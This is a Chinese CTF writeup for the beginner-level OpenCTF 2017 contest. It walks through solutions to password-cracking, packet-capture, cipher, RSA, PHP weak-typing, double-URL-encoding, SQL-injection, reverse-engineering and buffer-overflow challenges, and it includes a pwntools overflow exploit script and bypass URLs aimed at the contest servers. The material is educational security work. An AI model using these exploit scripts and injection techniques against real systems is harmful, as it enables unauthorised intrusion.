ISC2017极客嘉年华 —— OpenCTF 2017 WriteUp

  • A+
所属分类:安全博客

OpenCTF 2017是ISC2017现场展位活动“极客密室第一关”

难度为入门级别,较简单,有几道是XMAN 2017夏令营选拔赛和其它CTF赛事原题

zip (Misc100)

Hint:Ziperello,纯数字

可以用 ARCHPR 或者 Ziperello 破解得到压缩包密码:88888888,解压得到flag

XCTF{ke&cVR3OHWHx42ZygOceozE6KIxz1Zzj}

pcap (Misc100)

Hint:wireshark,tcp,urldecode

使用WireShark过滤TCP,看到有HTTP请求,GET /?q=XCTF%7BRSUJecDZ5xFp1z1X%26Nmpt%40PZSDQ%25Gbx6%7D HTTP/1.1rn,urldecode后得到flag

XCTF{RSUJecDZ5xFp1z1X&[email protected]%Gbx6}

Maya Cipher (Crypto100)

题目:耗子哥哥在美洲冒险时,帮助了最后一位玛雅人后裔。为了报答耗子哥哥,玛雅人后裔留给他一张预言的纸条。玛雅人的预言到底是什么呢?
Hint:Maya numerals

根据提示,把玛雅数字改写为阿拉伯数字

5 8 4 3 5 4 4 6 7 11
3 2 3 0 3 1 3 8 5 15
6 9 7 3 5 15 6 3 6 15
6 13 6 9 6 14 6 7 7 13

发现最大数字为15,猜测可以用16进制表示,改写成16进制表示

5 8 4 3 5 4 4 6 7 B
3 2 3 0 3 1 3 8 5 F
6 9 7 3 5 F 6 3 6 F
6 D 6 9 6 E 6 7 7 D

去除空格和换行,得到584354467B323031385F69735F636F6D696E677D,进行ASCII转换得到flag

XCTF{2018_is_coming}

RSA (Crypto100)

题目:Welcome To The Openctf 2017,The c, p, q, and e are parameters for the RSA algorithm.

p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
e = 65537
c = 69016319356655639210194946570348715066396274579181987745484908846232464436640043461016746215950609916307004870722625663551955221548688400875709926061159609460224830151731941059363474236594094101209402353834752606848369320902191207004466087273869348206495061740962728586464640440980967989689860668335396868406

参考资料:【技术分享】CTF中RSA的常见攻击方法

写个RSA解密脚本,跑一下就得到flag

坑:flag是RSA解密后的10进制数字

#!/usr/bin/env python
# encoding: utf-8

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

def main():
    p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
    q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
    e = 65537
    c = 69016319356655639210194946570348715066396274579181987745484908846232464436640043461016746215950609916307004870722625663551955221548688400875709926061159609460224830151731941059363474236594094101209402353834752606848369320902191207004466087273869348206495061740962728586464640440980967989689860668335396868406
    n = p * q
    d = modinv(e, (p-1)*(q-1))
    m = pow(c, d, n)
    print ("flag: %d" % m)

if __name__ == "__main__":
    main()

flag: 554035859905981120888026046266284028688068004006280022208626

jsjs (Web100)

题目:http://202.112.51.184:8101/
Hint:禁用javascript

通过浏览器菜单(右键、F12无效)打开开发者工具,查看网页源代码,即可得到flag

XCTF{_O0oo0O_js_is_FUNNY!}

variacover (Web100)

题目:http://202.112.51.184:8103/
Hint:parse_str()函数会把参数字符串当做php变量解析

这题考察 php弱类型 的知识,md5('QNKCDZO') == "0e830400451993494058024219903391" == 0e830400451993494058024219903391 == 0,问题出在0e开头==0,所以找到一个md5值也为0e开头的字符串即可,比如s878926199a

构造URL:http://202.112.51.184:8103/?id=a[0]=s878926199a

XCTF{sTr_covcderd_AND_you_kn0W?}

urldecode (Web100)

题目:http://202.112.51.184:8102/
Hint:服务器会对参数进行解码,urldecode()会再解码一次

贴个自己写的源代码:

<meta charset="utf-8">
<?
error_reporting(0);
if ($_GET['id'] == ""){
    echo "请给id赋值";
    exit();
}
if (eregi("OPENCTF", $_GET['id'])){
    echo "你距离flag只有1厘米!<?php tips: urldecode是一个php的函数>";
    exit();
}else{
    echo "你是来参加什么比赛的?";
}

$_GET['id'] = urldecode($_GET['id']);
if ($_GET['id'] == "OPENCTF"){
  echo "<h1>XCTF{UrlDeCode_oL_yOu_lol!} </h1>";
}

这题考查 二次编码 的知识,构造URL:http://202.112.51.184:8102/?id=%254FPENCTF

坑:id:OPENCTF,全部字符都需要大写

XCTF{UrlDeCode_oL_yOu_lol!}

SQL注入 (Web100)

题目:http://202.112.51.184:8201/

试了一下,表中存在id:1;id:2

默认输出错误信息,用 Polygon() 注入可爆出,数据库名:security;表名:article;字段名:id

简单构造注入语句,即可得到flag

XCTF{ut9x2a5f8t9e6s3a4g5j}

OpenReverse (Reverse100)

Hint:动态OD调试

使用 Ollydbg 动态调试,在00401147处设置断点,运行

随便输入Key,程序停在断点处,在内存中可以看到flag

XCTF{5eacs6y8p1o9gitc9521}

blind (Pwn100)

题目:nc 202.112.51.184 8301
Hint: 72位junk

返回一个内存地址,而且每次返回都是同一个。

根据提示构造72位junk,然后用返回的内存地址覆盖EIP

#!/usr/bin/env python
# encoding: utf-8

from pwn import *

p = remote('202.112.51.184', 8301)
junk = 'A' * 72
payload = junk + p64(0x40060d)
p.sendline(payload)
print (p.recvall())
p.close()

XCTF{sQ^yeLZKBVkoZ7^zOtigV5xsepBY&bB7}

getshell (Pwn100)

题目:nc 202.112.51.184 8302

有原题,不解释。原题WriteUp:https://github.com/ernw/ctf-writeups/tree/master/csaw2016/aul

XCTF{q0Cr1iwqlWW1m8ejiK[email protected]&}

Source: impakho.com | Author:impakho

相关推荐: Less-3

源码:未过滤,但变量id加了引号和括号。将变量id以字符串形式引入,和Less-1很像,但是却又多了个括号,猜测是防止注入语句。注入测试: ?id=12+and+1=1 显示正确 ?id=12+an 不完全语句也显示正确 猜测:括号将变量限制在括号范围内,尝试…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: